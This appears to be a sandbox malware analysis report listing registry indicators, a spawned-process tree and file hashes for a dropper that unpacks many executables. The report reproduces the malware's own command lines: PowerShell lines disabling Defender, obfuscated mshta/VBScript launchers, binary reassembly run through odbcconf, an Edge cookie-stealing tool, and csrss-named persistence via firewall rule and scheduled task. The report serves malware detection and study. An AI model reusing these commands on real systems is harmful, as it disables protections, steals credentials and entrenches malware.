| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15e81af69f990d3a6.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\odbcconf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1580e9cd8c23e.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15168f90478cc7.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe
"C:\Users\Admin\AppData\Local\Temp\85f5b66f8c0b9dd1838da31024190463ee565d0052f26bbfdaa84d12ed1163db.exe"
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15a8461882.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15635943177.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun154ca5fada.exe /mixtwo
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun157e7a96e632.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15168f90478cc7.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15591a43f8a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1580e9cd8c23e.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15b94526a807b.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1500b8e65c1f53.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15132bf2c585337a0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun150e9a93676ff.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15c4c762b69ba5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1524d92394d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156aa32cae4a.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun15e81af69f990d3a6.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1515dbfc0edab0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1585e1028b0.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun156d9ca8467.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Sun1507dd11d509.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1515dbfc0edab0.exe
Sun1515dbfc0edab0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe
Sun156d9ca8467.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15372e8db79ed3d.exe
Sun15372e8db79ed3d.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1580e9cd8c23e.exe
Sun1580e9cd8c23e.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15591a43f8a.exe
Sun15591a43f8a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe
Sun15635943177.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15e81af69f990d3a6.exe
Sun15e81af69f990d3a6.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe
Sun1585e1028b0.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun154ca5fada.exe
Sun154ca5fada.exe /mixtwo
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
Sun15a8461882.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe
Sun157e7a96e632.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15168f90478cc7.exe
Sun15168f90478cc7.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15c4c762b69ba5.exe
Sun15c4c762b69ba5.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156aa32cae4a.exe
Sun156aa32cae4a.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe
Sun15b94526a807b.exe
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1524d92394d.exe
Sun1524d92394d.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4472 -ip 4472
C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-HFUCS.tmp\Sun15b94526a807b.tmp" /SL5="$2024A,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 4520 -ip 4520
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun157e7a96e632.exe" -u
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if """"== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4472 -s 412
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 412
C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp
"C:\Users\Admin\AppData\Local\Temp\is-P4VBJ.tmp\Sun15b94526a807b.tmp" /SL5="$30204,870426,780800,C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe" /SILENT
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If """" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15635943177.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun156d9ca8467.exe" ) do taskkill -f /Im "%~NXg"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe
..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe
Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E
C:\Windows\SysWOW64\taskkill.exe
taskkill /f -im "Sun15635943177.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbsCriPT: ClOsE(cReateoBJeCT ( "wsCRipT.shell"). RUN("cMd.ExE /q /R TyPe ""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if ""-PS7ykUulCvwqoVkaBFLeqX_1Bi ""== """" for %i iN (""C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe"" ) do taskkill /f -im ""%~Nxi"" ", 0 ,trUe ) )
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4592 -ip 4592
C:\Windows\SysWOW64\taskkill.exe
taskkill -f /Im "Sun156d9ca8467.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCRipt: cLOSe ( creATEOBJeCt( "wSCriPt.ShELL"). rUN ( "Cmd /C cOPY /Y ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If ""-PJJdHOofvf~E"" == """" for %g IN ( ""C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe"" ) do taskkill -f /Im ""%~NXg"" " , 0, true) )
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4592 -s 356
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /R TyPe "C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe" >..\h02CuYYeZUcMDD.exe && starT ..\H02CUYyeZuCMDD.eXe -PS7ykUulCvwqoVkaBFLeqX_1Bi & if "-PS7ykUulCvwqoVkaBFLeqX_1Bi "== "" for %i iN ("C:\Users\Admin\AppData\Local\Temp\h02CuYYeZUcMDD.exe") do taskkill /f -im "%~Nxi"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C cOPY /Y "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" Q7J2UrO1XZC8DQK.EXe && StarT Q7J2Uro1XZC8DqK.EXE -PJJdHOofvf~E& If "-PJJdHOofvf~E" == "" for %g IN ( "C:\Users\Admin\AppData\Local\Temp\Q7J2UrO1XZC8DQK.EXe" ) do taskkill -f /Im "%~NXg"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VbSCrIPT: ClOSE (CReaTeobjECt ( "wsCRIPt.ShelL" ). run ( "cmd.EXe /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = ""MZ"" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F + 16AqXIX.Y + lSIVmd4C.I + VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q * ",0 ,TRUe ))
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR & copy /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /R EChO 0%timE%tQM> rHUir.hh & EcHO | SeT /p = "MZ" > PCN3bFXS.F& copy /b /y Pcn3bFXS.F+ 16AqXIX.Y+ lSIVmd4C.I+ VbVS~Fi.ZD+rhUIr.hh ..\JEnnF1QU.UEN & sTART odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN } & deL /Q *
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBScRIpt: close (crEateoBJeCT("wscRIpT.sHELl"). RUn ( "C:\Windows\system32\cmd.exe /q /C ECho | SeT /p = ""MZ"" > 2MXG5k.pR & copy /b /y 2MXG5K.pR + A0kCLvIX.Kc + SpiKDP6.H + ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku } " ,0 , TrUE ) )
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /q /C ECho | SeT /p = "MZ" > 2MXG5k.pR & copy /b /y 2MXG5K.pR +A0kCLvIX.Kc +SpiKDP6.H+ ApX~.n4 + G7TV3C~.QZE + P~ST7eWJ.E 9V~4.KU & starT odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" EcHO "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>PCN3bFXS.F"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" ECho "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" SeT /p = "MZ" 1>2MXG5k.pR"
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /A { regsVR ..\JeNnF1QU.UEN }
C:\Windows\SysWOW64\odbcconf.exe
odbcconf.exe /a { reGSVr .\9v~4.Ku}
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15a8461882.exe"
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe
"C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun1585e1028b0.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe /306-306
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\SYSTEM32\schtasks.exe
schtasks /delete /tn ScheduledUpdate /f
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
C:\Windows\SYSTEM32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
Files
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
| MD5 | 2c3db571085a0f88cd336201868ede9c |
| SHA1 | 26f219c2369c8c4c8ad8e658fa907f73078e274c |
| SHA256 | c9a4ba85ca3416b83d174844eba1c0aeb8b55d316a68e8d6cf7a732b9c14c2fd |
| SHA512 | 34d874cd8e1b5567ba9585cdeec5cf80e35475f1f8880194f09cf2005d3f9153b76ffaa5cd6f830b99ef472b9db37546358118bf3dd0f92933662067876dd65d |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\setup_install.exe
| MD5 | f7154abf1245e17ee802340608c5f728 |
| SHA1 | 48fc1a71ad8dd0f04699b60144ed28e50ecd61dd |
| SHA256 | 6a1adfee6f5c76521479177391647ec0cdd3c367600a72904d87c4edb25f5344 |
| SHA512 | e5f79d338e0c2bbb65a799c389479ec955d7370c674e5aa13ecbae7d62be57f51f4f7b24e597e36078c901539a60923baf489483689781005e05dd76095b2192 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libcurl.dll
| MD5 | d09be1f47fd6b827c81a4812b4f7296f |
| SHA1 | 028ae3596c0790e6d7f9f2f3c8e9591527d267f7 |
| SHA256 | 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e |
| SHA512 | 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libstdc++-6.dll
| MD5 | 5e279950775baae5fea04d2cc4526bcc |
| SHA1 | 8aef1e10031c3629512c43dd8b0b5d9060878453 |
| SHA256 | 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87 |
| SHA512 | 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libwinpthread-1.dll
| MD5 | 1e0d62c34ff2e649ebc5c372065732ee |
| SHA1 | fcfaa36ba456159b26140a43e80fbd7e9d9af2de |
| SHA256 | 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723 |
| SHA512 | 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libgcc_s_dw2-1.dll
| MD5 | 9aec524b616618b0d3d00b27b6f51da1 |
| SHA1 | 64264300801a353db324d11738ffed876550e1d3 |
| SHA256 | 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e |
| SHA512 | 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\libcurlpp.dll
| MD5 | e6e578373c2e416289a8da55f1dc5e8e |
| SHA1 | b601a229b66ec3d19c2369b36216c6f6eb1c063e |
| SHA256 | 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f |
| SHA512 | 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89 |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun15b94526a807b.exe
| MD5 | 204801e838e4a29f8270ab0ed7626555 |
| SHA1 | 6ff2c20dc096eefa8084c97c30d95299880862b0 |
| SHA256 | 13357a53f4c23bd8ac44790aa1db3233614c981ded62949559f63e841354276a |
| SHA512 | 008e6cb08094621bbcadfca32cc611a4a8c78158365e5c81eb58c4e7d5b7e3d36c88b543390120104f1c70c5393b1c1c38c33761cf65736fdf6873648df3fc8e |
C:\Users\Admin\AppData\Local\Temp\7zS4C341AF7\Sun150e9a93676ff.exe
| MD5 | 53759f6f2d4f415a67f64fd445006dd0 |
| SHA1 | f8af2bb0056cb578711724dd435185103abf2469 |
| SHA256 | 7477156f6856ac506c7ca631978c2369e70c759eb65895dfce8ba4cfce608d58 |
